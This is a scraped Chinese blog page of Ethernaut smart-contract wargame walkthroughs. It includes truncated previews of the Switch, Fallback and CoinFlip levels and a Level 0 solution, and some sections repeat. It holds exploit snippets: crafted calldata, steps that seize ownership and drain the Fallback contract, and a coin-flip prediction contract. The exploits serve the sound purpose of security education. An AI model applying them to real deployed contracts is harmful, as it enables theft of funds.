Leek DEV智能合约黑客攻击 Ethernaut: 29. Switch
Ethernaut 是一个由 OpenZeppelin 基于 Solidity 编程语言开发的对抗游戏,每个关卡都有需要被 Hack 的智能合约。教程GitHub - 攻击代码Bilibili - 视频教程YouTube - 视频教程TikTok - ….题目将合约中的 switchOn 改为 trueHack思路这道题 难度比较高,需要构建非常特殊的 CALLDATA 。const attack = '0x30c13ade0000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000000020606e1500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000476227e120000000000000000000...
Leek DEV智能合约黑客攻击 Ethernaut: 1.Fallback
Ethernaut 是一个基于 Web3/Solidity 的对抗游戏,受 overthewire.org 启发, 运行于以太坊虚拟机. 每个关卡是一个需要被 ‘hacked’ 的智能合约。题目把 Fallback 合约中的 owner改为自己,并且把合约中的余额转走。Hack思路合约本来应该是想做一个捐款合约,捐钱最多的人拥有这个合约的权限,但是在接收 Ether 的 receive() 回调方法里验证逻辑不对,可以比较容易跳过检查, 用非常少的钱就用有这个合约的 Owner 权限。// 1.检查合约owner、余额等信息 await contract.owner(); await getBalance(contract.address) // 2.发送最低金额以成为捐款人 await contract.contribute({value: toWei("0.0001")}) // 3.直接发送给合同 1 wei,这将使我们成为新的所有者 await sendTransaction({ from: player, to: contract.address , value:1 }...
Leek DEV智能合约黑客攻击 Ethernaut: 3. CoinFlip
Ethernaut 是一个由 OpenZeppelin 基于 Solidity 编程语言开发的对抗游戏,每个关卡都有需要被 Hack 的智能合约。教程GitHub - 攻击代码Bilibili - 视频教程YouTube - 视频教程TikTok - ….题目一个猜硬币正反面游戏,需要连续猜对10次。Hack思路所有的计算逻辑全部都写在了合约里,完全可以把逻辑复制一份计算出来。interface ICoinFlipChallenge { function flip(bool _guess) external returns (bool); } contract CoinFlipAttack { uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968; ICoinFlipChallenge public exploitInst; constructor(address _target) { exploitInst = ICoinFlipChallen...
Twitter: https://twitter.com/LeekDEV YouTube: https://www.youtube.com/@LeekDEV BILIBILI: https://space.bilibili.com/3493272831920239
Leek DEV智能合约黑客攻击 Ethernaut: 29. Switch
Ethernaut 是一个由 OpenZeppelin 基于 Solidity 编程语言开发的对抗游戏,每个关卡都有需要被 Hack 的智能合约。教程GitHub - 攻击代码Bilibili - 视频教程YouTube - 视频教程TikTok - ….题目将合约中的 switchOn 改为 trueHack思路这道题 难度比较高,需要构建非常特殊的 CALLDATA 。const attack = '0x30c13ade0000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000000020606e1500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000476227e120000000000000000000...
Leek DEV智能合约黑客攻击 Ethernaut: 1.Fallback
Ethernaut 是一个基于 Web3/Solidity 的对抗游戏,受 overthewire.org 启发, 运行于以太坊虚拟机. 每个关卡是一个需要被 ‘hacked’ 的智能合约。题目把 Fallback 合约中的 owner改为自己,并且把合约中的余额转走。Hack思路合约本来应该是想做一个捐款合约,捐钱最多的人拥有这个合约的权限,但是在接收 Ether 的 receive() 回调方法里验证逻辑不对,可以比较容易跳过检查, 用非常少的钱就用有这个合约的 Owner 权限。// 1.检查合约owner、余额等信息 await contract.owner(); await getBalance(contract.address) // 2.发送最低金额以成为捐款人 await contract.contribute({value: toWei("0.0001")}) // 3.直接发送给合同 1 wei,这将使我们成为新的所有者 await sendTransaction({ from: player, to: contract.address , value:1 }...
Leek DEV智能合约黑客攻击 Ethernaut: 3. CoinFlip
Ethernaut 是一个由 OpenZeppelin 基于 Solidity 编程语言开发的对抗游戏,每个关卡都有需要被 Hack 的智能合约。教程GitHub - 攻击代码Bilibili - 视频教程YouTube - 视频教程TikTok - ….题目一个猜硬币正反面游戏,需要连续猜对10次。Hack思路所有的计算逻辑全部都写在了合约里,完全可以把逻辑复制一份计算出来。interface ICoinFlipChallenge { function flip(bool _guess) external returns (bool); } contract CoinFlipAttack { uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968; ICoinFlipChallenge public exploitInst; constructor(address _target) { exploitInst = ICoinFlipChallen...
Twitter: https://twitter.com/LeekDEV YouTube: https://www.youtube.com/@LeekDEV BILIBILI: https://space.bilibili.com/3493272831920239
Subscribe to Leek DEV
Subscribe to Leek DEV
Share Dialog
Share Dialog
<100 subscribers
<100 subscribers
Ethernaut 是一个由 OpenZeppelin 推出的基于 Solidity 编程语言的一个 Web3 对抗类游戏,玩家可以 Hack 每个关卡智能合约来达到通关的效果。
Web3 开发入门
对区块链有一个大概的认知
了解开发需要的各种工具、平台
编程手艺+N
Solidity 入门起步、也许直接放弃
学会把趁手的高级编程语言NodeJS、Go、Python、Rust 接入 Web3
秃头面积+1
Solidity by Example - 各种 Solidity Code 案例
WTF Academy - Solidity 基础知识【中文】
OpenZeppelin - 通用Solidity基础库、行业标准
HardHat - Solidity 开发框架,基于NodeJS
Foundry - Solidity 开发框架,基本Rust 编写、可以使用Solidity 写测试用例
Soldity Docs - Solidity 官方开发文档
YouTube
Bilibili
https://ethernaut.openzeppelin.com/level/0x7E0f53981657345B31C59aC44e9c21631Ce710c7
源码
题目大意:
链上交互入门介绍
将合约中 cleared 变量修改为true
修改时会验证合约的一个密码,此密码在创建时存储在合约里。可以直接把这个密码读出来
await contract.password();
resp: 'ethernaut0'
await contract.authenticate("ethernaut0");
区块链上的数据对所有人都是可见的,所以像密码这种核心数据不应存储在链上【就算加密了也不行】。如需身份认证、应使用链上原生的签名验证,这个至少现在是非常难破解的。
PS: 区块链不能限制某本书只有你可以看,但是可以 证明 这本书? 是你的。
…
Ethernaut 是一个由 OpenZeppelin 推出的基于 Solidity 编程语言的一个 Web3 对抗类游戏,玩家可以 Hack 每个关卡智能合约来达到通关的效果。
Web3 开发入门
对区块链有一个大概的认知
了解开发需要的各种工具、平台
编程手艺+N
Solidity 入门起步、也许直接放弃
学会把趁手的高级编程语言NodeJS、Go、Python、Rust 接入 Web3
秃头面积+1
Solidity by Example - 各种 Solidity Code 案例
WTF Academy - Solidity 基础知识【中文】
OpenZeppelin - 通用Solidity基础库、行业标准
HardHat - Solidity 开发框架,基于NodeJS
Foundry - Solidity 开发框架,基本Rust 编写、可以使用Solidity 写测试用例
Soldity Docs - Solidity 官方开发文档
YouTube
Bilibili
https://ethernaut.openzeppelin.com/level/0x7E0f53981657345B31C59aC44e9c21631Ce710c7
源码
题目大意:
链上交互入门介绍
将合约中 cleared 变量修改为true
修改时会验证合约的一个密码,此密码在创建时存储在合约里。可以直接把这个密码读出来
await contract.password();
resp: 'ethernaut0'
await contract.authenticate("ethernaut0");
区块链上的数据对所有人都是可见的,所以像密码这种核心数据不应存储在链上【就算加密了也不行】。如需身份认证、应使用链上原生的签名验证,这个至少现在是非常难破解的。
PS: 区块链不能限制某本书只有你可以看,但是可以 证明 这本书? 是你的。
…
No activity yet